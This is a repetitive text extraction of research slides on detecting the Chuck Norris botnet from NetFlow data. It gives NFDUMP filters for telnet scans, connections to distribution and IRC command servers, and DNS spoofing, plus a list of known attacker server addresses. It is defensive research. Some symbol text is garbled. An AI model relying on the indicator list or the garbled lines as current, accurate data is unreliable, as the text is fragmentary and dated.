Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
